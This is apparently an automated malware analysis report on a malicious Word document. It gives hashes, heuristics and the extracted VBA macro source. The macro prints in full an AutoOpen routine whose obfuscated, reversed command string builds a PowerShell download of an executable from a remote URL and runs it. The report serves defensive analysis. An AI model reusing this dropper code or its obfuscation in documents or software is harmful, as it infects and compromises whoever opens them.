Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3fc4f8c1317a71ca…

MALICIOUS

Office (OLE)

72.8 KB Created: 2018-09-13 08:33:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: cfc289608cb149e9996c8836fbe080b7 SHA-1: 502f310b2e7daf6b4c86b8f53e52b5a70fc1cd75 SHA-256: 3fc4f8c1317a71ca882323a9fdee6e1b23f806baf88c5692394edfdf7089993c
82 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro attempts to execute a command using the Shell function, which is a common technique for downloading and executing further malicious content. The presence of the AutoOpen macro and the general structure suggest a macro-based downloader.

Heuristics 4

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4189 bytes
SHA-256: d7ae1f108c31b045c51a1093f0aa93a93445ff005e3b631ca90f218b771e4703
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "cCTwiwTZabatl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Dim uiFqXo()
ReDim uiFqXo(5)
uiFqXo(0) = 42818982
uiFqXo(1) = 4899780
uiFqXo(2) = 82
uiFqXo(3) = 368516641
uiFqXo(4) = 2367

   Dim mSzwjJ()
ReDim mSzwjJ(3)
mSzwjJ(0) = 1
mSzwjJ(1) = 8731
mSzwjJ(2) = 7035

   Dim DCRfjr()
ReDim DCRfjr(4)
DCRfjr(0) = 537
DCRfjr(1) = 245
DCRfjr(2) = 610
DCRfjr(3) = 3

   Dim GkTdGF()
ReDim GkTdGF(5)
GkTdGF(0) = 257117156
GkTdGF(1) = 1
GkTdGF(2) = 3203
GkTdGF(3) = 5
GkTdGF(4) = 38

   Dim Ocbplp()
ReDim Ocbplp(2)
Ocbplp(0) = 41
Ocbplp(1) = 532

   Dim IPvAQY()
ReDim IPvAQY(4)
IPvAQY(0) = 529942023
IPvAQY(1) = 737
IPvAQY(2) = 502383970
IPvAQY(3) = 1093

Shell@ uimDvBOG + QBMAznYjL + omIQhANzYMSw, Format(0)
   Dim PUqIzb()
ReDim PUqIzb(4)
PUqIzb(0) = 98
PUqIzb(1) = 77
PUqIzb(2) = 13
PUqIzb(3) = 6487

   Dim NSpVun()
ReDim NSpVun(5)
NSpVun(0) = 362819428
NSpVun(1) = 430
NSpVun(2) = 8
NSpVun(3) = 477
NSpVun(4) = 367910916

   Dim PddisO()
ReDim PddisO(5)
PddisO(0) = 3
PddisO(1) = 329821373
PddisO(2) = 921
PddisO(3) = 344097831
PddisO(4) = 499378655

End Sub



Attribute VB_Name = "HkbiEEzF"
Function uimDvBOG()

On _
Error _
Resume _
Next
Dim CBVZzf()
ReDim CBVZzf(4)
CBVZzf(0) = 7816
CBVZzf(1) = 205
CBVZzf(2) = 8194
CBVZzf(3) = 191559335

   Dim tFNVk()
ReDim tFNVk(4)
tFNVk(0) = 341
tFNVk(1) = 4
tFNVk(2) = 3159
tFNVk(3) = 557

   Dim mhCRjU()
ReDim mhCRjU(2)
mhCRjU(0) = 5
mhCRjU(1) = 9

kzzXNMo = Format(Chr(12 + 3 + 13 + 5 + 66)) + "md /V^" + ":^O/" + Format(Chr(8 + 2 + 8 + 3 + 46)) + Format(Chr(4 + 1 + 4 + 1 + 24)) + "s^e" + "^t ^6^D^" + "3=   ^ ^ ^ ^ ^     ^  ^ ^ " + " ^}^}^{h" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "^t^a" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "}^;^k^a^erb^;" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "^u^i$" + "^ ^m^et^I^-^e^" + "k^ovnI;)" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "u^i$ ^,^P^w"
Dim nwszj()
ReDim nwszj(3)
nwszj(0) = 129
nwszj(1) = 219611032
nwszj(2) = 278

wXLQDbzoA = "^o^$(^el^i^F^da^o^ln^w" + "o^D.t^" + "t^Q^${^yrt{)B^p^Z^$^ ni " + "Pwo^$(h" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "^a^ero^f" + "^;^'^ex^e.^" + "'^+^Q^BB^$^+^'^" + "\'+" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "il^bu^p:vn^e^$=" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "^u"
Dim CpYkwd()
ReDim CpYkwd(5)
CpYkwd(0) = 9
CpYkwd(1) = 6
CpYkwd(2) = 7
CpYkwd(3) = 77
CpYkwd(4) = 482

   Dim REjMGT()
ReDim REjMGT(3)
REjMGT(0) = 6987
REjMGT(1) = 56746321
REjMGT(2) = 8210

bhhiHB = "i$^;'5^" + "43^' ^=" + " Q^BB^$^;)'^@'(t" + "^i^lpS.'n^k^t^." + "^3yliq=l?ph^p.d^op" + "ovm^e^k/^" + "EO^X/^mo" + Format(Chr(12 + 3 + 13 + 5 + 66)) + ".^atf^osi^m" + "^em//^:^p^tt^h^'^=^BpZ$;tne^i" + "l" + Format(Chr(8 + 2 + 8 + 3 + 46)) + "^b^e^W^.teN^ ^t" + Format(Chr(12 + 3 + 13 + 5 + 66)) + "ejbo-^w"
Dim dikcNK()
ReDim dikcNK(2)
dikcNK(0) = 62
dikcNK(1) = 2

   Dim pZhCjD()
ReDim pZhCjD(3)
pZhCjD(0) = 39
pZhCjD(1) = 3
pZhCjD(2) = 4

onjDn = "en=ttQ$ ^l^l^e^h^sr^ew^o^" + "p&&^f^or /^L %" + Format(Chr(8 + 2 + 8 + 3 + 46)) + " ^in (" + "^259,-^1^,0)^d^o ^se^t ^w" + "n=!^wn!!^6^D^3:~%" + Format(Chr(8 + 2 + 8 + 3 + 46)) + "," + "1!&&i^f %" + Format(Chr(8 + 2 + 8 + 3 + 46)) + "=^=^0 " + Format(Chr(12 + 3 + 13 + 5 + 66)) + "^a^" + "l^l %^wn:"
Dim jSvnK()
ReDim jSvnK(2)
jSvnK(0) = 7289
jSvnK(1) = 9

   Dim hBJZdp()
ReDim hBJZdp(5)
hBJZdp(0) = 8
hBJZdp(1) = 41
hBJZdp(2) = 18
hBJZdp(3) = 8428
hBJZdp(4) = 20

   Dim lzPrb()
ReDim lzPrb(5)
lzPrb(0) = 55
lzPrb(1) = 811
lzPrb(2) = 6481
lzPrb(3) = 7
lzPrb(4) = 538

   Dim HuvVA()
ReDim HuvVA(2)
HuvVA(0) = 158
HuvVA(1) = 4

SSKqQiO = "*^wn^!=%" + Format(Chr(4 + 1 + 4 + 1 + 24)) + ""
uimDvBOG = kzzXNMo + wXLQDbzoA + bhhiHB + onjDn + SSKqQiO
   Dim pAbVR()
ReDim pAbVR(2)
pAbVR(0) = 2782
pAbVR(1) = 197506680

   Dim fXNbV
... (truncated)